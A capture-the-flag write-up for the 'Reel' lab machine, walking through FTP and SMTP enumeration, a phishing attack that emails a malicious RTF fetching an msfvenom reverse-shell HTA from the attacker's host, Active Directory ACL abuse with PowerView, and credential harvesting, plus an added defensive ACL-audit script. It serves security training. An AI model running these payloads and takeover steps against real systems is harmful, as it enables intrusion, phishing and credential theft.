Reel

Enumeration

As always, we start with the enumeration phase, in which we scan the machine looking for open ports and identify the services and versions running on them.

The following nmap command scans the target machine for open ports quickly and saves the output to a file:

nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.77 -oN allPorts

  • -sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.

  • --min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.

  • -p- scanning the entire port range, from 1 to 65535.

  • -T5 insane mode, the fastest of nmap's timing templates.

  • -Pn treat the host as online (skip host discovery).

  • -n scan without reverse DNS resolution.

  • -oN save the scan result into a file, in this case the allPorts file.

Now that we know which ports are open, let's find out the services and versions running on them. The following command scans these ports in more depth and saves the result into a file:

nmap -sC -sV -p21,22,25 10.10.10.77 -oN targeted

  • -sC performs the scan using the default set of scripts.

  • -sV enables version detection.

  • -oN save the scan result into a file, in this case the targeted file.

Anonymous login is enabled in the FTP server.

ftp 10.10.10.77

Inside the FTP server there is a directory called documents containing some files.

ftp> ls documents

Let's transfer all of them to our machine.

ftp> get AppLocker.docx

ftp> get readme.txt

ftp> get Windows\ Event\ Forwarding.docx

The readme.txt file says that someone is checking his email for .rtf files.

cat readme.txt

The AppLocker.docx file (converted to AppLocker.txt with docx2txt) contains instructions about an AppLocker procedure.

docx2txt AppLocker.docx; cat AppLocker.txt

The Windows Event Forwarding.docx file seems to be corrupted, so we cannot see its content.

docx2txt Windows\ Event\ Forwarding.docx

But we can see an email address in its metadata.

exiftool Windows\ Event\ Forwarding.docx

As port 25 (SMTP) is open, we can check with the smtp-user-enum tool whether the email address nico@megabank.com is valid.

smtp-user-enum -m RCPT -u nico@megabank.com 10.10.10.77 25

  • -m enumeration mode (RCPT, VRFY or EXPN); here RCPT.

  • -u username to test.

Exploitation

As the email address is valid, the idea is to generate a malicious .rtf file and send it to nico@megabank.com. There is a Python script that allows us to create malicious .rtf files. First, we have to generate a malicious .hta file with msfvenom, which will send us a reverse shell.

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.11 LPORT=4444 -f hta-psh -o malicious.hta

  • -p indicates the type of payload.

  • LHOST local host IP.

  • LPORT local port of the listener.

  • -f output format.

  • -o save the output to a file.

In the current directory, start a simple HTTP server so the victim machine can download the malicious.hta file.

python -m http.server 80

Now, set a netcat listener on port 4444 with rlwrap.

rlwrap nc -lvnp 4444

  • -l listen mode.

  • -v verbose mode.

  • -n numeric-only IP, no DNS resolution.

  • -p specify the port to listen on.

Now run the script with Python 2 to generate the malicious.rtf file.

python2 41894.py -M gen -w malicious.rtf -u http://10.10.14.11/malicious.hta

  • -M mode; gen generates the malicious file only.

  • -w name of the malicious RTF file.

  • -u path to the HTA file.

Finally, if we send the malicious file to nico@megabank.com, we should get a shell as nico and be able to grab the user flag.

sendemail -f alfa8sa@megabank.com -t nico@megabank.com -s 10.10.10.77 -m "Open de juicy file" -a malicious.rtf

  • -f sender email address.

  • -t receiver email address.

  • -s SMTP server.

  • -m message to send.

  • -a file attachment.

Privilege Escalation

On the desktop of the user nico there is a file called cred.xml, which contains a password for the tom user stored as a PowerShell SecureString.

type \users\nico\desktop\cred.xml

We have to use PowerShell to decode the password.

powershell (Import-CliXml -Path \users\nico\desktop\cred.xml).GetNetworkCredential().password

Now we can log in as tom via SSH.

sshpass -p '1ts-mag1c!!!' ssh tom@10.10.10.77

On the desktop of the tom user there is a directory called AD Audit.

dir \Users\tom\Desktop

There are a few things inside AD Audit.

dir "\Users\tom\Desktop\AD Audit"

The note.txt file says that there is no way to gain admin privileges.

type "\Users\tom\Desktop\AD Audit\note.txt"

Inside the BloodHound directory we can see the PowerView.ps1 script.

dir "\Users\tom\Desktop\AD Audit\BloodHound"

And inside the Ingestors directory there are some files and binaries.

dir "\Users\tom\Desktop\AD Audit\BloodHound\Ingestors"

One of them is acls.csv. Let's transfer it to our local machine: first, start an SMB server with impacket.

impacket-smbserver smbFolder $(pwd) -smb2support

Then, copy the acls.csv file to the smbFolder share.

copy acls.csv \\10.10.14.11\smbFolder\

The file contains a lot of information about objects, principals, rights and access control types.

csvtool readable acls.csv

If we grep for tom, we'll see that he has WriteOwner rights on the claire user.

csvtool readable acls.csv | grep tom

This means that tom can take ownership of the claire object, grant himself the right to reset her password, and then change it. We'll use PowerView.ps1 to do it. First, open a PowerShell shell.

powershell

Then, import the PowerView.ps1 module located in the BloodHound directory.

Import-Module .\PowerView.ps1

Set tom as the owner of the claire object.

Set-DomainObjectOwner -identity claire -OwnerIdentity tom

Give tom the right to change claire's password.

Add-DomainObjectAcl -TargetIdentity claire -PrincipalIdentity tom -Rights ResetPassword

Create a SecureString $cred with the password alfa8sa123$!.

$cred = ConvertTo-SecureString "alfa8sa123$!" -AsPlainText -force

Finally, change claire's password to the credential we just made.

Set-DomainUserPassword -identity claire -accountpassword $cred

Now, we can log in as claire via SSH.

sshpass -p 'alfa8sa123$!' ssh claire@10.10.10.77

If we grep for claire in the acls.csv file, we'll see that she has WriteDacl rights on the Backup_Admins group.

csvtool readable acls.csv | grep claire
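Instead of grepping acls.csv by hand for each user, the following added Python example (not from the original writeup) parses a constructed excerpt in the ingestor's column layout, reports every explicit allow ACE that grants a takeover right (WriteOwner, WriteDacl, GenericAll, ...), and chains those grants so both edges used above (tom over claire, claire over Backup_Admins) show up as one path. The column names, the EXAMPLE.LOCAL domain and the rows are assumptions for this example, not the real file from the box.

```python
import csv
import io
from collections import defaultdict

# Rights that let a principal take over the target object; chosen here as an assumption.
DANGEROUS_RIGHTS = {"GenericAll", "GenericWrite", "WriteDacl", "WriteOwner", "ExtendedRight"}

# Constructed acls.csv excerpt (assumed header layout); combined rights are comma-separated.
SAMPLE_ACLS = """\
ObjectName,ObjectType,PrincipalName,PrincipalType,ActiveDirectoryRights,ACEType,AccessControlType,IsInherited
claire@EXAMPLE.LOCAL,USER,tom@EXAMPLE.LOCAL,USER,WriteOwner,,AccessAllowed,False
BACKUP_ADMINS@EXAMPLE.LOCAL,GROUP,claire@EXAMPLE.LOCAL,USER,"WriteDacl, WriteOwner",,AccessAllowed,False
tom@EXAMPLE.LOCAL,USER,DOMAIN ADMINS@EXAMPLE.LOCAL,GROUP,GenericAll,,AccessAllowed,True
nico@EXAMPLE.LOCAL,USER,tom@EXAMPLE.LOCAL,USER,ReadProperty,,AccessAllowed,False
claire@EXAMPLE.LOCAL,USER,nico@EXAMPLE.LOCAL,USER,GenericAll,,AccessDenied,False
"""


def find_dangerous_aces(csv_text, ignore_inherited=True, ignore_principals=()):
    """Return (principal, right, object) tuples for explicit allow ACEs granting takeover rights.

    Inherited ACEs are skipped by default (they usually come from the domain's default
    admin groups); ignore_principals lets an auditor drop known-good principals."""
    findings = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        if row["AccessControlType"] != "AccessAllowed":
            continue  # deny ACEs grant nothing
        if ignore_inherited and row["IsInherited"].strip().lower() == "true":
            continue
        if row["PrincipalName"] in ignore_principals:
            continue
        for right in row["ActiveDirectoryRights"].replace(" ", "").split(","):
            if right in DANGEROUS_RIGHTS:
                findings.append((row["PrincipalName"], right, row["ObjectName"]))
    return findings


def takeover_path(findings, start, goal):
    """Breadth-first search over principal -> object edges; returns the shortest chain
    of objects from `start` to `goal`, or None if no chain exists."""
    graph = defaultdict(list)
    for principal, _right, obj in findings:
        graph[principal].append(obj)
    queue, seen = [[start]], {start}
    while queue:
        path = queue.pop(0)
        if path[-1] == goal:
            return path
        for nxt in graph[path[-1]]:
            if nxt not in seen:
                seen.add(nxt)
                queue.append(path + [nxt])
    return None
```

Running find_dangerous_aces on a real export and feeding the result to takeover_path from any low-privileged user is the same check a domain admin should run after an audit like the one in the AD Audit folder.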

This means that we can add the user claire to the Backup_Admins group.

net group Backup_Admins claire /add

In order to get the new group's permissions, you might need to log out and log in again. Now the user claire is in the Backup_Admins group.

net group Backup_Admins

We can see that the Backup_Admins group has full rights on the \Users\Administrator directory.

icacls \Users\Administrator

But we can't read the flag yet.

type \Users\Administrator\Desktop\root.txt

There is a directory called Backup Scripts on the administrator's desktop, which contains some files.

dir \Users\Administrator\Desktop

If we search for the word Password in all the files inside that directory, we'll find the password of the administrator user.

powershell "dir | Select-String 'Password'"

Finally, if we log in via SSH as the administrator user, all we have to do is reap the harvest and take the root flag.

sshpass -p 'Cr4ckMeIfYouC4n!' ssh administrator@10.10.10.77
